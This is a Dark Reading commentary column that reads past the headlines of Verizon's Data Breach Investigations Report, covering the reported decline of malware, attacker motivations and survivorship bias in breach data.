Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Threat Intelligence

7/13/2020
10:00 AM
Chad Loeven
Chad Loeven
Commentary
Connect Directly
Twitter
LinkedIn
RSS
E-Mail vvv
50%
50%

Decoding the Verizon DBIR Report: An Insider's Look Beyond the Headlines

To truly understand cybersecurity trends, we must look beyond the headlines and ask more of the data. What you learn might surprise you.

For the past 13 years, Verizon's "Data Breach Investigations Report" (DBIR) has been the industry's definitive resource for documenting and benchmarking the global state of cybersecurity. As always, the Verizon DBIR team does an admirable job of sifting through an impressively large data set to tease out the underlying trends that are driving the market.

But as Miles Davis, the legendary jazz trumpeter, once famously said, "It's not the notes you play, it's the notes you don't play." In other words, it's the silence between the notes that enables the listener to interpret and appreciate the music's deeper meaning and context. When reading a broad industry survey such as the DBIR, it is likewise instructive to look beyond the bolded headlines and ask further questions of the data to best understand the meaning behind these trends.

Here's what I mean.

Headline #1: The Global Malware Threat Is Evaporating
According to DBIR: The Verizon DBIR team documents a precipitous decline of malware-related threats, from 50% in 2016 to just 6%, stating that "we think that other attack types such as hacking and social breaches benefit from the theft of credentials, which makes it no longer necessary to add malware in order to maintain persistence. So while we definitely cannot assert that malware has gone the way of the eight-track tape, it is a tool that sits idle in the attacker's toolbox in simpler attack scenarios."

Beyond the headline: Of course, it's heartening to read that malware threats are waning, and I agree with the interpretation that the broad availability of user credentials has, to a great extent, obviated the need for threat actors to employ malware to maintain persistence. Why bother climbing through a small basement window if you can just open the front door, right?

However, despite this downward trend, few threat researchers I know would take comfort in this pronouncement alone — nor would they presume that malware is a threat they no longer need worry about. Rather, the decline could be attributed to the fact that exploit kits that were once the province of a sophisticated few threat actors are now broadly available to a larger population via easy-to-use subscription services that don't require the use of advanced malware to compromise the network (not to mention the industry as a whole has collectively improved its ability to detect and block malware threats in general).

Another force behind the decline is that threat actors are relying less on malware as a blunt instrument to gain entry and rather leveraging legitimate system utilities and tools for malicious purposes. This is perhaps best exemplified with the rise of "living-off-the-land binaries" (LOLBins). Typically, threat actors will abuse legitimate apps like PowerShell with malicious scripts to avoid detection by conventional antivirus tools.

Headline #2: It's Still All About the Benjamins, but ...
According to DBIR: Financial rewards remain the primary motivator for threat actors. However, DBIR authors acknowledged a "secondary" motivating factor, for which the compromised infrastructure "is not the main target, but a means to an end as part of another attack."

Beyond the headline: What the authors call secondary is a convenient way to group a wide spectrum of disparate motivations under a single umbrella. However, it also hints at another underlying trend, which is that threat actors are being both more selective at deploying malware and increasingly using evasive malware strains to conduct longer-term intelligence-gathering operations.

With respect to droppers and Trojans, the authors note that while they find these particular threats decreasing over time, "their backdoor and remote-control capabilities are still a key functionality for more advanced attackers to operate and achieve their objective." We've seen ample evidence of this in our work at VMRay analyzing a variety of banking Trojans (for example, Trickbot and Ursnif). We have seen firsthand how they are increasingly being leveraged to conduct a wide range of secondary information reconnaissance — from querying the network for configuration settings, to recording what software and services are installed and running, to breaching HR and payroll systems — all of which attackers can leverage for future attacks.

This supports the case that more sophisticated attackers — be they nation-states or criminal organizations — are leveraging known malware strains and repurposing them for extended campaigns whose primary objective is to maintain persistence.

Headline #3: Reverse Survivorship Bias (aka, It's What We Aren't Seeing That Could Really Be Hurting Us)
According to DBIR: "Our incident corpus suffers from the opposite of survivorship bias. Breaches and incidents are records of when the victim didn't survive. … Malware being blocked by your protective controls is an example of survivorship bias where the potential victim didn't get the malware" … and that "it is important to acknowledge that the relative percentage of malware that we see present in breaches and incidents may not correspond to your experiences fighting, cleaning and quarantining malware throughout your own organization."

Beyond the headline: Perhaps the most well-known example of survivorship bias comes from statistician Abraham Wald, who during World War II took this bias into account when considering how to minimize bomber loss to enemy fire. He observed that it was the planes that never came home — rather than the ones that did despite being riddled with bullet holes, especially in their wings — that should inform the decision as to where bombers should be reinforced with additional armor (the fuselage area).

It's good to see the DBIR authors both acknowledge and highlight this particular issue because even the most comprehensive datasets tell only part of the story. In addition to their observation of malware being blocked by protective controls being an example of survivorship bias where the potential victim didn't get the malware, the open question remains as to how many malware threats never made it into the sample population not because they were blocked, but rather because they succeeded in evading detection. It stands to reason that the malware of 2019 is significantly better at hiding its tracks than the malware of 2014.

The Verizon DBIR has become a truly invaluable resource for threat researchers and security analysts who are continuously tasked with planning for every variety of "what-if" scenario. More than anything, though, the report is a showcase of cross-industry collaboration at its finest, with growing participation from an array of diverse security vendors, government agencies, and nonprofit organizations. Regardless of what the data says about the state of the current threat environment, this type of open cooperation among even the fiercest competitors represents our best hope in keeping our future secure.

(Note: VMRay is among the report's contributing organizations.)

Related Content:

 

 

Register now for this year's fully virtual Black Hat USA, scheduled to take place August 1–6. Click for details on conference information and to register.

 

Chad Loeven has been involved in enterprise security for over 20 years. Prior to VMRay he managed technology alliances at RSA, the security division of EMC. He came on board RSA via its acquisition of Silicium Security and Silicium's ECAT ETDR (Endpoint Threat Detection and ... View Full Bio
 

Recommended Reading:

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
COVID-19: Latest Security News & Commentary
Dark Reading Staff 8/10/2020
Pen Testers Who Got Arrested Doing Their Jobs Tell All
Kelly Jackson Higgins, Executive Editor at Dark Reading,  8/5/2020
Researcher Finds New Office Macro Attacks for MacOS
Curtis Franklin Jr., Senior Editor at Dark Reading,  8/7/2020
Register for Dark Reading Newsletters
White Papers
Video
Cartoon Contest
Current Issue
Special Report: Computing's New Normal, a Dark Reading Perspective
This special report examines how IT security organizations have adapted to the "new normal" of computing and what the long-term effects will be. Read it and get a unique set of perspectives on issues ranging from new threats & vulnerabilities as a result of remote working to how enterprise security strategy will be affected long term.
Flash Poll
The Changing Face of Threat Intelligence
The Changing Face of Threat Intelligence
This special report takes a look at how enterprises are using threat intelligence, as well as emerging best practices for integrating threat intel into security operations and incident response. Download it today!
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2020-9079
PUBLISHED: 2020-08-11
FusionSphere OpenStack 8.0.0 have a protection mechanism failure vulnerability. The product incorrectly uses a protection mechanism. An attacker has to find a way to exploit the vulnerability to conduct directed attacks against the affected product.
CVE-2020-16275
PUBLISHED: 2020-08-10
A cross-site scripting (XSS) vulnerability in the Credential Manager component in SAINT Security Suite 8.0 through 9.8.20 could allow arbitrary script to run in the context of a logged-in user when the user clicks on a specially crafted link.
CVE-2020-16276
PUBLISHED: 2020-08-10
An SQL injection vulnerability in the Assets component of SAINT Security Suite 8.0 through 9.8.20 allows a remote, authenticated attacker to gain unauthorized access to the database.
CVE-2020-16277
PUBLISHED: 2020-08-10
An SQL injection vulnerability in the Analytics component of SAINT Security Suite 8.0 through 9.8.20 allows a remote, authenticated attacker to gain unauthorized access to the database.
CVE-2020-16278
PUBLISHED: 2020-08-10
A cross-site scripting (XSS) vulnerability in the Permissions component in SAINT Security Suite 8.0 through 9.8.20 could allow arbitrary script to run in the context of a logged-in user when the user clicks on a specially crafted link.